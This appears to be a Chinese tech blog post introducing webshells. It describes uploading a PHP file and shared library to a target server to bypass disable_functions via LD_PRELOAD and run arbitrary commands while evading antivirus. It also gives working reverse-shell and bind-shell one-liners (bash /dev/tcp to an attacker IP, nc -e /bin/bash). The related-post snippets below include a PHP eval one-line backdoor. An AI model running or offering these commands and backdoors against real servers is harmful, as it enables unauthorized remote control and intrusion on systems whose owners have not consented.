webshell入门(二)

最新推荐文章于 2025-07-14 00:55:36 发布
原创 最新推荐文章于 2025-07-14 00:55:36 发布 · 1.5k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #webshell

本文介绍了如何利用PHP和特定SO文件在Linux环境中绕过安全防护执行任意代码,详细阐述了通过LD_PRELOAD技术实现webshell的功能。同时,分享了Linux下创建反向和正向反弹shell的一行命令,为安全研究和渗透测试提供了实用技巧。

webshell绕安全模式执行命令

  上一次讲了利用java的runtime.exce()方法执行任意代码,但是必然会受到各种杀毒软件的监控,本次学习一个绕过杀毒软件的webshell

  参考网址:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

在上面网址下载下安装包

在这里插入图片描述
把上图中的php和so文件上传到目标服务器上去,当我们访问该php页面。可以执行任意代码

在这里插入图片描述
根据提示,把参数传入

在这里插入图片描述
如上图:即可执行任意代码

ps:linux一行代码反弹webshell

1、 反向向反弹shell:
靶机: bash -i >& /dev/tcp/192.168.0.128/6666 0>&1
攻击机器: nc -lvp 6666

2、正向向反弹shell:
靶机: nc -lvvp 8888 -e /bin/bash
攻击机器: nc 192.168.0.128 8888

squabLi
关注
网络安全从入门到精通(特别篇V):应急响应之webshell处置流程
HACKONE的博客
04-10 339
Webshell指的是以JSP PHP ASP等网页脚本形式存在的一种服务器可执行文件 一般带有文件操作 命令执行功能 是一种网页后门。
webshell基本原理和使用(一句话木马实践)
m0_65853019的博客
06-09 4725
webshell的基本原理和使用
入门-什么是webshell
weixin_30588675的博客
03-27 371
webshell是什么? 顾名思义,"web" - 显然需要服务器开放web服务,"shell" - 取得对服务器某种程度上操作权限。 webshell常常被称为匿名用户(入侵者)通过WEB服务端口对WEB服务器有某种程度上操作的权限,由于其大多是以网页脚本的形式出现,也有人称之为网站后门工具。 2webshell有什么作用? 一方面,webshell被站长常常用于网...
Webshell【冰蝎魔改】(入门
夜风的博客
02-20 773
关注公众号夜风Sec,回复CTF获取资源,不定时分享各种视频和资料。 解决1:绕过识别( 魔改打乱特征, 新增加密算法 ) 解决2:绕过查杀( 魔改打乱特征, 新增加密算法 )① 在线网址: https://www.decompiler.com/② 等反编译分析工具③ IDEA自带的插件: 创建工程 添加模块依赖 添加工件 修改代码,打包包 新增加密协议 参考的加密算法:https://xz.aliyun.com/t/12453 生成全新的冰蝎目录 -> 方便打开 server目录来源
Webshell基础
最新发布
2302_81945070的博客
07-14 816
Webshell是一种嵌入在Web服务器中的恶意脚本文件(如PHP、ASP、JSP等格式),通常由攻击者通过漏洞上传或植入。它能让攻击者以网页访问的方式远程控制服务器,执行命令、查看/修改文件、窃取数据甚至提权,是黑客入侵Web应用后维持控制权的常用工具。因其伪装性强(常命名为普通脚本名),且通过Web端口通信,容易绕过常规防火墙检测,对服务器安全构成严重威胁。
朴素贝叶斯检测WebShell2
ailx10
09-28 231
在上一篇文章中,我们通过对PHP文本分词,基于朴素贝叶斯建立检测模型,直接对黑样本分词还是太粗糙了,准确率只有79%,本质上WebShell是一个黑客远程管理工具,一系列管理功能本质上一系列函数调用,我们尝试针对函数调用建立特征。1.数据搜集和数据清洗针对黑样本,以1-gram算法生成全局词汇表,其中1-gram基于函数和字符串常量进行切割,所以设置token的切割方法:\b\w+\b\(|\'\...
webshell入门()
IT_arookie的博客
11-12 2503
利用java的java.runtime.exec()或java.long.ProcessBuilder()来执行系统命令 1.java.runtime.exec()执行系统命令 package web.shell; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; /** * @Date 2020/11/11
webshell免杀--免杀入门
2302_79590880的博客
08-18 973
webshell免杀入门,了解免杀基本概念
Webshell批量扫描工具:新手入门利器
资源摘要信息:"Shell批量扫描器是一款专门针对webshell漏洞进行批量扫描的工具,非常适合那些对网络安全有所了解,但尚处于入门阶段的入侵新手使用。该工具主要利用各种已知的webshell漏洞进行自动化扫描,能够帮助...
2024年网安最新WebShell脚本检测机器学习_机器学习检测webshell脚本实践(2)
2401_84301389的博客
05-01 93
logger.info(“白样本总量:%i” % normal_number)logger.info(“黑样本总量:%i” % webshell_number)logger.info(“准确率:%s” % metrics.accuracy_score(y_test, y_pred))logger.info(“训练集评估:”)logger.info(“测试集评估:”)
webshell反弹工具包
01-25
成套web反弹工具包,包含控制端,被控端。和端口监听工具,配套详细的使用说明
十三课-webshell制作.ppt
02-22
网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。
Web-Shell实战 - Weevely
weixin_40270125的博客
01-04 1375
  今天我们介绍的是一个轻量级的Web-Shell工具 - Weevely。Github地址https://github.com/epinna/weevely3。   PHP backdoor agent 我们将使用Weevely来创建一个php代理后门,然后部署在目标服务器上。 运行weevely.py,就将为我们生成一个名为agent.php的代理后门, 设置访问密码确保只有我们可以...
学习笔记webshell初探
mcc的博客
05-27 771
webshell初探 一.webshelll简介 webshell也就是网页muma,包括大马和小马,小马通过caidao等工具进行连接,大马自带管理界面。现在webshell支持包括php,asp,jsp,perl等语言。 .webshell体验 1.小马总结 一句话 1.<?php @eval($_POST["pass"]); ?> 上面就是最简单的一句话,用于菜刀进...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 4184
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
JavaWeb后门(webshell)基础
st3pby的博客
12-25 3826
最著名的莫过于 PHP 的各种奇思妙想的后门,但与 PHP 不同的是,Java 是强类型语言,语言特性较为严格,不能够像 PHP 那 样利用字符串组合当作系统函数使用,但即便如此,随着安全人员的进一步研究, 依旧出现了很多奇思妙想的 JSP Webshell。Java是一种通用的计算机编程语言,它是并发的,基于类的,面向对象的,并且专门设计为具有尽可能少的实现依赖性。利用这个特性我们可以操作类名,从而达到躲避检测的目的。jsp的后缀可以兼容为jspx的代码,也兼容jspx的所有特性,如CDATA特性。
[渗透测试笔记] 17.初步了解webshell 提权
H4ppyD0g的博客
02-09 740
什么是webshell webshell是指在web服务器上的一个脚本程序,通过这个脚本程序可以上传下载文件、查看数据库信息以及调用一些系统命令等。webshell通常是由asp、php、jsp等语言编写,攻击者通过文件上传漏洞将脚本上传到网站作为自己的后门。 webshell原理 本地可以通过远程连接的方式和网站的webshell建立连接,本地发送命令后,网站的shell脚本就会去执行此命令,从...
【攻防世界】web新手练习010 webshell
weixin_43545225的博客
09-12 659
【攻防世界】web新手练习010 webshell 难度系数:2 题目描述: 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 题目场景: http://111.200.241.244:63533/ 解题思路 遇见web题目,习惯性F12看一下控制台。 嗯,毫无线索。 题目提示“ webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值